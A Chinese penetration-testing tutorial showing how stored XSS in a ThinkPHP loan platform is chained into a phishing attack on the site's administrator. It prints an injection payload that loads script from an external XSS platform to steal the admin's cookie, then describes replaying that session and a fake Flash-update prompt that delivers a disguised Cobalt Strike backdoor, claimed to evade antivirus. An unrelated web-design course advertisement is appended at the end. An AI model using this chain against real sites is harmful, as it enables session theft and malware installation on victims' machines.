请注意:
本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。
名言:
你对这行的兴趣,决定你在这行的成就!
2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>关注我,私信回复“资料”获取<一
网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!
网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码等,还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。
网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是,如果他们要保护自己的信息,所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。
这篇主要演示如何利用XSS植入钓鱼,获得管理员内部电脑权限!
黑客(攻击者):
IP:192.168.1.9
系统:kali.2020.4
kali上作为cs的服务端!
VPS服务器:
thinkphp平台地址:http://test1.dayuixiyou.cn/
钓鱼地址:http://flash.dayuixiyou.cn
办公电脑:
系统:windwos7
双网卡:
192.168.175.153
10.10.1.5
目前kali上运行了Cobalt strike ,攻击者在自己的公网VPS服务器上制作了后门页面钓鱼,通过渗透发现thinkphp贷款平台页面存在XSS漏洞利用,通过插入XSS-js代码,植入链接,最终黑客控制管理员办公电脑的过程!!
此次演示贷款thinkphp平台在公网服务器上!
进入个人中心!
注册用户名密码!
登录用户名密码后,普通用户界面!点击设置!
输入结算信息,测试下!
输入:
测试结果修改成功!查看下前端…
查看源代码-编辑后查看到没变动,XSS代码还是存在…说明存在XSS攻击
https://xss.pt/xss.php?do=login
进入XSS利用平台,google也有很多别的平台!!
随意注册一个账号!
创建一个新的项目,随意填写!
选择Keepsession保持会话!
下一步!
会弹出需要执行的XSS利用代码…选择标准代码测试!
</tExtArEa>'"><sCRiPt sRC=https://xss.pt..aJ></sCrIpT>
</tExtArEa>'"><sCRiPt sRC=https://xss.pt/..aJ></sCrIpT>
这一段就是payload!将XSS连接信息返回到https://xss.pt平台上!
提交信息后,可看到网络net中XSS执行成功了…
执行成功,那么XSS平台就收到了信息,可看到!
点击提现…
申请结算,成功后,会将XSS执行代码转发到后台结算该模块中!
当后台管理员访问管理界面,给客户结算资金的时候,点击提现申请模块!就会执行XSS植入的代码!!
这时候,就返回了管理员的cookie和URL信息!
目录扫描获得管理后台登录页面,通过Burp suite转包拦截后!
将XSS平台获取XSS漏洞植入代码返回的包中,修改其中的url和cookie信息!
send执行后,通过cookie进入到了管理员后台!
复制URL!
浏览器中访问后,正常进入管理员后台!
在公网服务器搭建钓鱼页面,任何能访问互联网客户都可以访问该页面!
利用Cobal Strike生成C#语言的shell…
利用该shell进行混淆,并利用python的tinyaes模块混淆也行,在来个分离免杀,最后利用pyinstaller生成exe外壳…必过全国杀毒软件!(不演示过程)
将flash修改名字为:flashplayer_install_cn.exe(或者修改为update等吸引人下载的名称都行)
这是Flash贷款平台源码文件目录!!
修改index.html代码,找到其中href="进行修改为:flashplayer_install_cn.exe
意思就是点击页面立即下载就能自动下载目录下的exe后门文件!
在准备个js文件,意思是执行该js后,会在页面提示:
您的 FLASH 版本过低,尝试升级后访问该页面!
并访问到该页面:http://flash.dayuixiyou.cn/
将exe和js都上传到功能网服务器apache底层!
测试访问可看到正常读取,确保内网管理员能执行XSS后访问到js文件,这里就可以开始了!
可看到利用(三)中XSS利用的方法,执行插入:
“><”
#需要前后加入闭合 “> <”
当"立即提交" 后直接执行了XSS植入的js文件,并提示了js中的内容!!
然后点确定后,直接跳转到flash页面!
和(三)中的方法一样,需要在后台管理页面也执行XSS,需要结算金额,让管理员去结算的时候点击执行XSS!
5、执行XSS下载flash
可看到内网管理员上班期间,登录到管理后台,登录管理员用户后,工作职责需要给客户结算金额,点击了提现申请,一般客户安全意识极差!!
点击完成后,出现了您的 FLASH 版本过低,尝试升级后访问该页面!,一般情况下都会点击确认!
确认后跳转到flash页面,逼真的页面!!点击立即下载!!
这里有个20.1MB的大小信息,这里简单在html修改下数字和EXE内容大小即可!
可看到下载了该后门,这里图标我没修改,google或者百度利用Folder Changer修改成flash安装包的图标更逼真!!
这里的exe是全免杀的,杀毒软件都无法放行!!
6、成功XSS钓鱼
执行安装!
成功在kali攻击机上的CS上线,可看到获取到了管理员电脑的权限!!
这里通过渗透中,找到了某平台的XSS漏洞,利用XSS漏洞植入代码执行,诱骗到了对方客服或者管理员的内网电脑权限!
其中最少需要熟悉如何搭站、HTML、js、域名、XSS、免杀、CS4等等知识才可搭建!
那么很多人都说flash都是经典的钓鱼漏洞了,全国警惕性都会高很多,那么我还是老话,提供的是思路,如果是一个破解软件,一个购买网站,一个利用虚荣心或者是贪小便宜的购物页面,等等进行钓鱼,进行各类的植入的话,那有多少人会中招?
希望大家提高安全意识,没有网络安全就没有国家安全!
虽然基础,但是必须牢记于心。
人们常说隔行如隔山,对于很多零基础想要学网页设计的人来说,觉得这是一门非常复杂难懂的学科,让很多想要学习这门学科的人望而却步。
随着IT技术的高速发展,行业对网页设计人才需求不断增加,各大网站、广告公司、设计公司都在大量招聘网页设计人员。目前网页设计是发展前景最好,人才需求巨大的行业之一。据统计,我国目前从事网页设计的人员不多,而专门设计网页的人才只有几万人。因此,未来网页设计行业对人才的需求会不断上升,随之衍生的网页设计行业其他职位的就业前景也会非常好。
30秒测试你适不适合学网页设计:
http://www.tianhujy.com/list-93-1.html?wm=tt_lyt_wysj (复制到网址框打开)
成为网页设计师需要学静态网页:
Dreamweaver CS4:网页布局、制作;Html&Css简介;网站管理与维护、上传与下载;案例分析
Fireworks:美工设计、网页配色;CI、LOGO、Banner的制作;常见网页动画制作、网页布局
Flash CS4:经典网页动画、广告、片头、贺卡设计与分析;MTV制作、交互式网站简介
Photoshop CS4:Photoshop操作基础、图像优化处理、经典实例分析与制作、gif动画、广告gif图片
Illustrator CS4:广告招牌制作、灯箱广告、服装广告设计、企业徽标设计、名片设计
成为网页设计师需要学动态网页:
Html语言详细解介、CSS样式、IIS、C#语言、Asp. net动态、SQLServer数据库、Access数据(送)、JavaScript、Flash8.0高级编程、网站筹划、网站推广、电子购物车、ChatRoom、BBS制作。注:此部分基本上是程序员工作,并不是网页设计师所要学会的。
零基础新手如何学习网页设计?
(1).首先要精通设计软件,把Photoshop玩转,这是网页设计的主力工具!
(2).深入学习排版设计、色彩构成,掌握视觉基础规律(构成、透视、光影)
(3).掌握网页设计规范,了解常见的网页布局形式,学习交互设计等基础知识。
(4).了解前端代码HTML、CSS、JS、JQuery的运用,学一款代码编辑软件(如:Dreamweaver)
(5).了解你设计网站的公司及产品,熟悉这个公司及其产品面向的人群!
(6).拓展学习网站优化、开发、后台数据处理常识(加分项目!)
前四个是基本功,后面的是加分项。越靠前越重要!
给自己制作个学习规划也是很重要的,推荐这里:
http://www.tianhujy.com/tg-81.html?wm=tt_lyt_wysj (复制到网址框打开)
网页的代码等确实晦涩难懂,但是只要你有耐心和恒心坚持学下去,入门之后就是一马平川,会觉得越学越简单,越学越轻松。
着国内互联网的快速发展,中国网民的数量大量的增加。所以很多人通过互联网去实现自己的要求。比如说现在很流行的网购、通过招聘网站进行求职等等,随着社会的发展,人们的生活会更加的依赖网络。因此每个人,每个公司都想去做网站,个人通过网站推广自己、公司通过网站推广公司的品牌与知名度、获得更大的利益化。所以学网页设计有没有前途显而易见。
30秒测试你适不适合学网页设计:
http://www.tianhujy.com/list-93-1.html?wm=tt_lyt_wysj (可复制到网址框打开哦)
*请认真填写需求信息,我们会在24小时内与您取得联系。